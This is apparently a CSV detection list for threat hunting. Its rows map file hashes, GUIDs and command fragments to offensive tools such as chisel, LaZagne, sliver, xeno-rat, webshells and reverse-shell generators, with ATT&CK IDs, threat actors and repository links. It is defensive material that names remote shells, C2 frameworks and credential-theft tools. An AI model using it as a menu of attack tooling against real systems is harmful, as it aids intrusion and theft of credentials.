"*63e119d9a3c93d0751e545753aa05c59ed767d3d0f87ae6b9a4309573899f117*",".{0,1000}63e119d9a3c93d0751e545753aa05c59ed767d3d0f87ae6b9a4309573899f117.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27938"
"*63e9c4ad28c4ee5fd63bee6124590a0edb6c7dc4b20d1b4f6aefdb53f5b94a1a*",".{0,1000}63e9c4ad28c4ee5fd63bee6124590a0edb6c7dc4b20d1b4f6aefdb53f5b94a1a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27940"
"*63ec96c5-075f-4f22-92ec-cf28a2f70737*",".{0,1000}63ec96c5\-075f\-4f22\-92ec\-cf28a2f70737.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#GUIDproject","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","27941"
"*63ee1eb3f80d8eb690404beaee64db746c1b94158fef0933f441692eeff43fa8*",".{0,1000}63ee1eb3f80d8eb690404beaee64db746c1b94158fef0933f441692eeff43fa8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27942"
"*63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713*",".{0,1000}63ef9e8f57db894995c6c89dc58c854d529b8480078b5b608cc6e75722f4c713.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27943"
"*63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123*",".{0,1000}63f5ce1c0d7cacc9f68421eb56b0640a48fd52695fefbe3589d7a2520a684123.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27944"
"*63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6*",".{0,1000}63f6929cf8f9c534611dc567df4e773bc6172288d3c6edcb3f92a09e303ca8d6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27945"
"*-64 -format=reflective-dll *",".{0,1000}\-64\s\-format\=reflective\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","27947"
"*64==eyJzbGVlcF9zZWNvbmRzIjogMjAsICJ2YXJpYXRpb25fc2Vjb25kcyI6IDB9*",".{0,1000}64\=\=eyJzbGVlcF9zZWNvbmRzIjogMjAsICJ2YXJpYXRpb25fc2Vjb25kcyI6IDB9.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27948"
"*64==eyJzbGVlcF9zZWNvbmRzIjogNSwgInZhcmlhdGlvbl9zZWNvbmRzIjogNn0=*",".{0,1000}64\=\=eyJzbGVlcF9zZWNvbmRzIjogNSwgInZhcmlhdGlvbl9zZWNvbmRzIjogNn0\=.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","27949"
"*64005eea1af219477177e1f5a2479f4214705ef814f2ca2e70d921bf696b0808*",".{0,1000}64005eea1af219477177e1f5a2479f4214705ef814f2ca2e70d921bf696b0808.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","27950"
"*640e8023020b5e649ff5f7571e6402f0f3c3524a1a43113335e2fece9505aba9*",".{0,1000}640e8023020b5e649ff5f7571e6402f0f3c3524a1a43113335e2fece9505aba9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27952"
"*6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f*",".{0,1000}6412cb5d528ee93be2fc08b2c72cdee6c36e38ce5064d2685139bcbf9962298f.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","27954"
"*641816acccccdfc2ed22e186d2f82a9a2c558617542a9e4b69b284a330a15daa*",".{0,1000}641816acccccdfc2ed22e186d2f82a9a2c558617542a9e4b69b284a330a15daa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27956"
"*641867dbb57f198f42dc86ea0d27eaaab36190417ffc24e6a186c831a98c0051*",".{0,1000}641867dbb57f198f42dc86ea0d27eaaab36190417ffc24e6a186c831a98c0051.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","27957"
"*641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f*",".{0,1000}641a94207f95ee2eb5cff95317e1aab73db6366fd3c2e5942bae83f0f3cb666f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27959"
"*64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a*",".{0,1000}64293e56dfaad772c31a8d53e7ea876b9db7aaea29e89381684f56227952813a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27961"
"*643ad690-5c85-4b12-af42-2d31d11657a1*",".{0,1000}643ad690\-5c85\-4b12\-af42\-2d31d11657a1.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#GUIDproject","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","27964"
"*643d5833bf21a57f837071016958a67d73868d730a85b637ec71bdf3705068aa*",".{0,1000}643d5833bf21a57f837071016958a67d73868d730a85b637ec71bdf3705068aa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27965"
"*643de75be44ad32b70cee688f031ea110a078d6cffb79a48001717a5e0ebf909*",".{0,1000}643de75be44ad32b70cee688f031ea110a078d6cffb79a48001717a5e0ebf909.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","0","#filehash","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","27966"
"*643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5*",".{0,1000}643e677418a7b03b82f340efb76cdb2dad8c63dca5f14b653b0b2d89376dced5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27967"
"*644758B1-C146-4D3B-B614-8EB6C933B0AA*",".{0,1000}644758B1\-C146\-4D3B\-B614\-8EB6C933B0AA.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","#GUIDproject","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","27970"
"*6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8*",".{0,1000}6448c50a9a80154c2f1ca5b7525ffc8822f16562b1774a54efd066fcc80620e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","27971"
"*644AFE4A-2267-4DF9-A79D-B514FB31830E*",".{0,1000}644AFE4A\-2267\-4DF9\-A79D\-B514FB31830E.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","27972"
"*644cdb7a7f0d50a84f6b7ad2e213636d52862b9491425e8be2fb7b4d91ac1131*",".{0,1000}644cdb7a7f0d50a84f6b7ad2e213636d52862b9491425e8be2fb7b4d91ac1131.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27973"
"*644e2fa03a4d45b8d0417819a7548339069df8d405131039006968b312c8c6f4*",".{0,1000}644e2fa03a4d45b8d0417819a7548339069df8d405131039006968b312c8c6f4.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","#filehash","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","27974"
"*645524305b8203fddf667329025f7ce531c9bc664f3186d5db5cfa0ff55d53b5*",".{0,1000}645524305b8203fddf667329025f7ce531c9bc664f3186d5db5cfa0ff55d53b5.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","27975"
"*6455615d468553dbe82bcea9bb1e67082c4d728939abb16b05e8e378ed4af09b*",".{0,1000}6455615d468553dbe82bcea9bb1e67082c4d728939abb16b05e8e378ed4af09b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27976"
"*6455d210924926d364ebf88ff053821ff2d603ea99b17d1dbb454a7d061992cc*",".{0,1000}6455d210924926d364ebf88ff053821ff2d603ea99b17d1dbb454a7d061992cc.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#filehash","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27977"
"*64591a6674fa71f5bf6858e009d487a56dc13d306cdab14a76e7b6fe49d4338b*",".{0,1000}64591a6674fa71f5bf6858e009d487a56dc13d306cdab14a76e7b6fe49d4338b.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","27978"
"*6461a823b6693d08cf0fe8be939138b7cf2ee31cba7f162e1f2f7b62d7446a7e*",".{0,1000}6461a823b6693d08cf0fe8be939138b7cf2ee31cba7f162e1f2f7b62d7446a7e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27980"
"*646698ef7a2a2cf03c2068c8e1c8b2f8fc18128b6027100c45acfe18b5c6d177*",".{0,1000}646698ef7a2a2cf03c2068c8e1c8b2f8fc18128b6027100c45acfe18b5c6d177.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27981"
"*647a81d98da7fd542e27a095a125cb51273ad7340829362e76fa59426d9a8a23*",".{0,1000}647a81d98da7fd542e27a095a125cb51273ad7340829362e76fa59426d9a8a23.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27983"
"*647c7e069b40a7fcade145d8fe942345e1c18dc54218a85b425ab7f33a868499*",".{0,1000}647c7e069b40a7fcade145d8fe942345e1c18dc54218a85b425ab7f33a868499.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27985"
"*6481fa0be3fd79b6aab74328a3d475b5decec17ff03d0293c2212cbfe53c5dfa*",".{0,1000}6481fa0be3fd79b6aab74328a3d475b5decec17ff03d0293c2212cbfe53c5dfa.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27986"
"*64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de*",".{0,1000}64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27987"
"*648BA42AFD2FEC89A055E69B21A04CB11B74F13916249F4BC3512C3145FDC249*",".{0,1000}648BA42AFD2FEC89A055E69B21A04CB11B74F13916249F4BC3512C3145FDC249.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","27989"
"*64976360321e4f2e591527df2114cee80b6c210be230b38c9b4abf6506804040*",".{0,1000}64976360321e4f2e591527df2114cee80b6c210be230b38c9b4abf6506804040.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27992"
"*649be8fb570c82231730dbdba7934429187a5d8deaf0a17150aa304786378434*",".{0,1000}649be8fb570c82231730dbdba7934429187a5d8deaf0a17150aa304786378434.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27994"
"*64a0a19cce004d6f35a0995ac42f960e7a4b78f56b03a2937e8e9459312a31b2*",".{0,1000}64a0a19cce004d6f35a0995ac42f960e7a4b78f56b03a2937e8e9459312a31b2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27995"
"*64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671*",".{0,1000}64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27996"
"*64a8d27e296bcb483eea9e6b7145236d919b1dc3d4bdd80259e175e439f0d92c*",".{0,1000}64a8d27e296bcb483eea9e6b7145236d919b1dc3d4bdd80259e175e439f0d92c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27997"
"*64ac445fc926e54e4083cc474a92414c76ef1e22cc002bf52efd3db5594cb76d*",".{0,1000}64ac445fc926e54e4083cc474a92414c76ef1e22cc002bf52efd3db5594cb76d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27998"
"*64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935*",".{0,1000}64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27999"
"*64c61eefcf2d457486e071a3c869c39d4a9583820ab007c8347ea9f34b0da570*",".{0,1000}64c61eefcf2d457486e071a3c869c39d4a9583820ab007c8347ea9f34b0da570.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28001"
"*64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced*",".{0,1000}64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28002"
"*64cd8640e2b53358f8fbafbcbded6db53e1acd49fe4ccc8196c8ed17c551bc70*",".{0,1000}64cd8640e2b53358f8fbafbcbded6db53e1acd49fe4ccc8196c8ed17c551bc70.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#filehash","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","28003"
"*64ce94651ee719279668c5d3bcfb376da9993aba306dc8b7f1e4def4c6917312*",".{0,1000}64ce94651ee719279668c5d3bcfb376da9993aba306dc8b7f1e4def4c6917312.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","28004"
